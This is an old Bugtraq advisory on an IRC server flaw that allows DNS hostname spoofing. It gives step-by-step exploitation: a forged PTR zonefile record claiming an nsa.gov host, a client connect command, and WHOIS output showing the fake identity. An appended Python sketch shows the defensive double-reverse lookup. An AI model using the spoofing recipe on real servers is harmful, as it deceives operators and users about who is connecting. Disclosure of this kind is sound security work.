Bugtraq mailing list archives
OpenProjects IRCD allows DNS spoofing
From: Jukka Mutex <jmutex () Aphex NewGold NET>
Date: Tue, 9 Oct 2001 18:45:19 GMT
* OpenProjects.NET IRCD DNS Spoofing *

OpenProjects.net's ircd has some truly braindead code re DNS lookups and doesn't do a proper double-reverse paranoid lookup. In fact, it is possible to spoof any hostname that actually exists on the internet. Here is how to exploit it.

1. Choose a Hostname to Spoof.

It is important to keep in mind that you must choose a hostname that actually exists. For our example, we will use 'gary7.nsa.gov'.

2. Point Your Reverse Lookup To The Hostname.

For our example, we will put the following in our BIND zonefile:

    47.222.42.209.in-addr.arpa. IN PTR gary7.nsa.gov.

Where we will assume you are using the same IP I used, 209.42.222.47.

3. Connect To A Vulnerable IRC Server.

    BitchX -H 209.42.222.47 jmutex asimov.openprojects.net

Try a WHOIS on yourself.

    /whois jmutex
    | jmutex (jmutex () gary7 nsa gov) (Government)
    | ircname : Jukka Mutex
    | server : asimov.openprojects.net (Fremont, CA)
    : idle : 0 hours 0 mins 24 secs (signon: Tue Oct 9 05:32:16 2001)

Credits: jmutex () newgold net, chrisj () newgold net, lilo
Found by: Joseph Mallett
Affects: OpenProjects u2.10.05.18.(ipcheck4-5)
Rumored to Affect: Hybrid

Copyright (c) 2001 Joseph Mallett. All rights reserved.
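The double-reverse lookup that the advisory says the ircd omits, sketched as an added example (not part of the original post and not the ircd's own code): a server accepts a PTR name only when that name's forward records include the connecting address. The function names, the `client.example.net` host and all forward addresses are assumptions constructed for illustration; only the 209.42.222.47 PTR entry comes from the post.

```python
import ipaddress
import socket

def system_ptr(ip):
    """Reverse (PTR) lookup through the system resolver; None if there is no record."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:  # covers socket.herror and socket.gaierror
        return None

def system_forward(hostname):
    """Forward (A/AAAA) lookup; returns a set of address strings, empty on failure."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(hostname, None)}
    except OSError:
        return set()

def verified_hostname(ip, ptr_lookup=system_ptr, forward_lookup=system_forward):
    """Return the PTR name only if it resolves forward to `ip`; otherwise the bare IP.

    The PTR record is set by whoever runs the reverse zone for the client's address,
    so it is only a claim. The forward zone belongs to the name's real owner, so the
    name is trusted only when both directions agree.
    """
    client = ipaddress.ip_address(ip)
    name = ptr_lookup(ip)
    if not name:
        return ip
    name = name.rstrip(".").lower()
    for addr in forward_lookup(name):
        try:
            if ipaddress.ip_address(addr.split("%")[0]) == client:
                return name
        except ValueError:
            continue  # skip anything the resolver returned that is not an address
    return ip

# Constructed sample zone data so the check runs offline. The first PTR entry is the
# one from the advisory; every forward address is made up (documentation ranges).
SAMPLE_PTR = {"209.42.222.47": "gary7.nsa.gov.", "198.51.100.7": "client.example.net."}
SAMPLE_FORWARD = {"gary7.nsa.gov": {"192.0.2.10"}, "client.example.net": {"198.51.100.7"}}

def sample_check(ip):
    """Run the check against the constructed records above instead of live DNS."""
    return verified_hostname(ip, SAMPLE_PTR.get, lambda h: SAMPLE_FORWARD.get(h, set()))
```

With this check in place, the connection from the post would be shown by its IP address, because the claimed name does not resolve back to it.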